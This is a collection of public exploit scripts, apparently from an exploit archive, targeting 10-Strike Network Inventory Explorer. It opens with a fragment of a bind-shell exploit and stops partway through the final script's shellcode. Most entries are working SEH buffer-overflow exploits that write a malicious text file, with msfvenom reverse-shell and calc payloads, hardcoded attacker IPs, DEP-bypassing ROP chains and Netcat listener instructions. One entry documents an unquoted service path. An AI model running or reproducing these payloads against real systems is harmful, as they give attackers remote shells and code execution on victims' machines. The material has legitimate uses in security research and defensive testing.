shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"

magic  = '\xd9\xee'                             # fldz
magic += '\xd9\x74\x24\xf4'                     # fnstenv [esp-0xc]
magic += '\x59'                                 # pop ecx
magic += '\x80\xc1\x05'                         # add cl,0x5
magic += '\x80\xc1\x05'                         # add cl,0x5
magic += '\x90'                                 # nop
magic += '\xfe\xcd'                             # dec ch
magic += '\xfe\xcd'                             # dec ch
magic += '\xff\xe1'                             # jmp ecx 

buffer  = '\x90' * 28                           # nops
buffer += shellcode                             # bind shell
buffer += '\xcc' * (516-28-len(shellcode))      # filler to nSEH 
buffer += '\x75\x06\x74\x06'                    # nSEH | jump net
buffer += '\x18\x05\xfc\x7f'                    # SEH  | 0x7ffc0518 : pop edi # pop edi # ret  [SafeSEH Bypass]
buffer += '\x90' * 5                            # nops 
buffer += magic                                 # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic))  # junk

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928 

# Proof of Concept:
# 1.Run python2 exploit.py to generate overflow.txt
# 2.Transfer overflow.txt to the Windows 10 machine
# 3.Setup Netcat listener on attacker machine 
# 4.Open 10-Strike Network Inventory Explorer Pro
# 5.Select Computers tab from the uppermost set of tabs
# 6.Select From Text File option
# 7.Open overflow.txt
# 8.Receive reverse shell connection on attacker machine! 

#!/usr/bin/env python
import struct

charslist = ""               
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]         

for i in range (0x00, 0xFF+1):
        if i not in badchars:   
                charslist += chr(i) 

#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
"\x51\x55\x3e\xf2\x52\x7c")

#pattern_offset.rb -l 250 -q 41316841
offset = 213

#nasm > jmp short 8
nseh = "\xeb\x06\x90\x90"
junk = "A" * (offset - len(nseh))

#0x61e012f6 : pop edi # pop ebp # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)

#metasm > sub esp,0x10
subesp10="\x83\xec\x10"
payload = shellcode

buffer = junk + nseh + seh + subesp10 + payload

f = open("overflow.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage:  https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

srvInventoryWebServer    srvInventoryWebServer   C:\Program Files
(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network
Inventory Explorer Pro\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
# Date: 2020-12-22
# Exploit Author: Florian Gassner
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.05
# Tested on: Windows 10 x64

# Computer -> From Text File -> Choose exploit.txt

import struct

"""
Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
"""

OFFSET = 214

"""
badchars = '\x00\x09\x0a\x0d\x3a\x5c'
"""

"""
Log data, item 23
 Address=01015AF4
 Message=  0x01015af4 : pop ecx # pop ebp # ret 0x04 |  {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
"""

pop_pop_ret = struct.pack("<I", 0x01015af4)

short_jump = '\xEB\x06\x90\x90'

"""
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
"""
shellcode =  ""
shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"

payload =  'A' * (OFFSET - len(short_jump))
payload += short_jump
payload += pop_pop_ret
payload += '\x90' * 8
payload += shellcode

f = open("exploit.txt", "w")
f.write(payload)
f.close()
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
# Date: 2020-03-30
# Exploit Author:   Hodorsec
# Version: 9.03
# Software Link:    https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Vendor Homepage:  https://www.10-strike.com
# Tested on:        Win8.1 x64 - Build 9600

# Description:      
# - Exploits the functionality to load a list of computers from a file
# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP
# - Used a jump after ROP to go to a buffer for more space

# Reproduction:
# - Run the script, a TXT file will be generated
# - Open the program and click on tab "Computers"
# - Click the button "From Text File" and select the generated TXT file
# - Clck OK and check results

# WinDBG initial crash output:
# (f54.f48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0         nv up ei pl nz na po cy
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210203
# NetworkInventoryExplorer+0x2b47:
# 00402b47 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (f54.f48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
# 41414141 ??              ???


#!/usr/bin/python

import sys, struct

filename = "poc_10_strike_nie.txt"

# Maximum length
maxlen = 5000

# Offsets
crash_esi = 2145                                                # Initial space until ESI buffer filling
crash_seh = 217                                                 # SEH
crash_nseh = crash_seh - 4                                      # NSEH
landingpad = 310                                                # Space for RET NOP landingpad after stackpivoting

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread
# Payload size: 220 bytes
shellcode =  b""
shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"
shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"
shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"
shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"
shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"
shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"
shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"
shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"
shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"
shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"
shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"
shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"
shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"
shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"
shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"
shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"
shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"
shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"
shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"
shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"

# ROP chain
def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x7c344efe,  # POP EDX # RETN [MSVCR71.dll] 
      0x61e9b30c,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
      0x010283e5,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe] 
      0x010296a1,  # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe] 
      0x61e7555f,  # POP EBP # RETN [sqlite3.dll] 
      0x61e63eaf,  # & push esp # ret 0x04 [sqlite3.dll]
      0x7c37678f,  # POP EAX # RETN [MSVCR71.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x7c34d749,  # NEG EAX # RETN [MSVCR71.dll] 
      0x0102a8a0,  # POP EBX # RETN [NetworkInventoryExplorer.exe] 
      0xffffffff,  #  
      0x61e0579d,  # INC EBX # RETN [sqlite3.dll] 
      0x0102104a,  # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe] 
      0x7c3458e6,  # POP EDX # RETN [MSVCR71.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x7c351eb1,  # NEG EDX # RETN [MSVCR71.dll] 
      0x7c369c4a,  # POP ECX # RETN [MSVCR71.dll] 
      0x7c38dfd7,  # &Writable location [MSVCR71.dll]
      0x7c34a40e,  # POP EDI # RETN [MSVCR71.dll] 
      0x0101da30,  # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
      0x01014218,  # POP EAX # RETN [NetworkInventoryExplorer.exe] 
      0x90909090,  # nop
      0x01014244,  # PUSHAD # RETN [NetworkInventoryExplorer.exe] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()

# NOPPING
retnop = struct.pack("<L", 0x61e0103e)                          # RET # sqlite3.dll
prenop = "\x90" * 200                                           # Pre NOP's after jumping back in stack, sledding until shellcode
postnop = "\x90" * 16                                           # Post NOP's after running ROP chain to disable DEP

# Jump back on stack for payload space
jmpback = "\xe9\x9f\xf9\xff\xff"                                # jmp 0xfffff9a4 # Jump back on stack for more space

# Prefix
prefix = "A" * crash_nseh                                       # Junk until NSEH
nseh = "B" * 4                                                  # Junk again, no use for NSEH
seh = struct.pack("<L", 0x0101ce0b)                             # ADD ESP,0BDC # RETN 0x0C    ** [NetworkInventoryExplorer.exe] ** # Stackpivot
suffix = prenop                                                 # Prenopping until shellcode
suffix += shellcode                                             # Magic!
suffix += retnop * landingpad                                   # RET NOP as a landingpad after stackpivot, still having DEP enabled
suffix += rop_chain                                             # Disable DEP
suffix += postnop                                               # Old school NOP-sledding
suffix += jmpback                                               # Jump! Just like van Halen
suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix))    # Junk for filling

# Concatenate string for payload
payload = prefix + nseh + seh + suffix                          # Put it all together

try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
# Date: 2020-09-02
# Exploit Author: Sectechs
# Vendor Homepage: https://www.10-strike.com
# Version: 8.65
# Tested on: Windows 7 x86 SP1 

import os
import sys
import struct
import socket


crash ="A"* 209 

# jmp short 8
# kali@root:msf-nasm_shell
# nasm> jmp short 8
Next_SE_Pointer = "\xeb\x06\x90\x90"
# 61e8497a
SE_Handler="\x7a\x49\xe8\x61"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed 
payload = (
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
"\x68\x55\x41\x41")
buffer = crash + Next_SE_Pointer + SE_Handler  + "\x90" * 20 +  payload  + "\x90" * 200
f=open("PoC6.txt","w")
	
f.write(buffer)
f.close()
'''
  ----------------------------------
  | NEXT SEH Pointer               |
--|------ ESP                      |     |     < ------- A * 209
| |---------------------------------     |
| | SE_Handler        ▲            |     |
| |   #POP #POP #RET  |            |     |  
| | -------------------------------|     |
|					 ▼ Stack
|
|
|______ ► -------------------------
         |      PAYLOAD            | -------- ► call | KALI |
         __________________________

'''
HireHackking 
#!/usr/bin/python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-29-19
# Vulnerable Software: 10-Strike Network Inventory Explorer 8.54
# Vendor Homepage: https://www.10-strike.com/
# Version: 8.54 
# Software Link 1: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app, select Computers tab  
# 3. click on 'From Text File'
# 4. choose 10strike.txt that was generated 
# 5. pop calc

# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains

# original seh poc from Hashim Jawad, EDB: 44838
# notes from author state offset is based upon username size, username for poc is 'user'

# badchars; \x00\x0a\x0d\x2f

import struct

filename = "10strike.txt"

junk  = "\x41" * 209

seh = struct.pack('<L',0x10013e29)

fill = "\x42"*12

#VirtualProtect()
#ESI = ptr to VirtualProtect()
rop = struct.pack('<L',0x7c3762b3)   # POP EAX # RETN 
rop += struct.pack('<L',0x61e9b30c)  # ptr to &VirtualProtect() 
rop += struct.pack('<L',0x1001872e)  # MOV EAX,DWORD PTR DS:[EAX] # RETN 
rop += struct.pack('<L',0x100101f2)  # POP EBX # RETN 
rop += struct.pack('<L',0xffffffff)  #
rop += struct.pack('<L',0x100186d1)  # ADD EBX,EAX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c358a01)  # INC EBX # XOR EAX,EAX # RETN 
rop += struct.pack('<L',0x7c3501d5)  # POP ESI # RETN
rop += struct.pack('<L',0xffffffff)  #
rop += struct.pack('<L',0x61e8509c)  # ADD ESI,EBX # RETN 
rop += struct.pack('<L',0x7c370464)  # INC ESI # RETN 

#EBP = ReturnTo (ptr to jmp esp)
#mona.py jmp -r esp -cpb '\x00\x0a\x0d'
rop += struct.pack('<L',0x61e05892)  # POP EBP # RETN 
rop += struct.pack('<L',0x61e053a9)  # push esp # ret

#EBX = dwSize x201
rop += struct.pack('<L',0x7c348495)  # POP EAX # RETN 
rop += struct.pack('<L',0xfffffdff)  # 
rop += struct.pack('<L',0x7c351e05)  # NEG EAX # RETN 
rop += struct.pack('<L',0x100101f2)  # POP EBX # RETN 
rop += struct.pack('<L',0xffffffff)  #  
rop += struct.pack('<L',0x61e0579d)  # INC EBX # RETN 
rop += struct.pack('<L',0x100186d1)  # ADD EBX,EAX # XOR EAX,EAX # RETN 
	  
#EDX = NewProtect (0x40)
rop += struct.pack('<L',0x7c344160)  # POP EDX # RETN 
rop += struct.pack('<L',0xffffffc0)  # 
rop += struct.pack('<L',0x7c351eb1)  # NEG EDX # RETN 
	  
#ECX = lpOldProtect (ptr to W address)
rop += struct.pack('<L',0x7c37157a)  # POP ECX # RETN
rop += struct.pack('<L',0x61e894c0)  # &Writable location sqlite3

#EDI = ROP NOP (RETN)
rop += struct.pack('<L',0x1001ab53)  # POP EDI # RETN
rop += struct.pack('<L',0x1001ab54)  # ROP-NOP 
	  
#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x7c3647cc)  # POP EAX # RETN 
rop += struct.pack('<L',0x90909090)  # nop

#PUSHAD
rop += struct.pack('<L',0x10019094)  # PUSHAD # RETN 

nops = "\x90"*10

#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d\x3a\x5c' -f python
#Payload size: 220 bytes
calc =  ""
calc += "\xbb\x29\x86\xf9\x07\xda\xdb\xd9\x74\x24\xf4\x5e\x31"
calc += "\xc9\xb1\x31\x31\x5e\x13\x83\xee\xfc\x03\x5e\x26\x64"
calc += "\x0c\xfb\xd0\xea\xef\x04\x20\x8b\x66\xe1\x11\x8b\x1d"
calc += "\x61\x01\x3b\x55\x27\xad\xb0\x3b\xdc\x26\xb4\x93\xd3"
calc += "\x8f\x73\xc2\xda\x10\x2f\x36\x7c\x92\x32\x6b\x5e\xab"
calc += "\xfc\x7e\x9f\xec\xe1\x73\xcd\xa5\x6e\x21\xe2\xc2\x3b"
calc += "\xfa\x89\x98\xaa\x7a\x6d\x68\xcc\xab\x20\xe3\x97\x6b"
calc += "\xc2\x20\xac\x25\xdc\x25\x89\xfc\x57\x9d\x65\xff\xb1"
calc += "\xec\x86\xac\xff\xc1\x74\xac\x38\xe5\x66\xdb\x30\x16"
calc += "\x1a\xdc\x86\x65\xc0\x69\x1d\xcd\x83\xca\xf9\xec\x40"
calc += "\x8c\x8a\xe2\x2d\xda\xd5\xe6\xb0\x0f\x6e\x12\x38\xae"
calc += "\xa1\x93\x7a\x95\x65\xf8\xd9\xb4\x3c\xa4\x8c\xc9\x5f"
calc += "\x07\x70\x6c\x2b\xa5\x65\x1d\x76\xa3\x78\x93\x0c\x81"
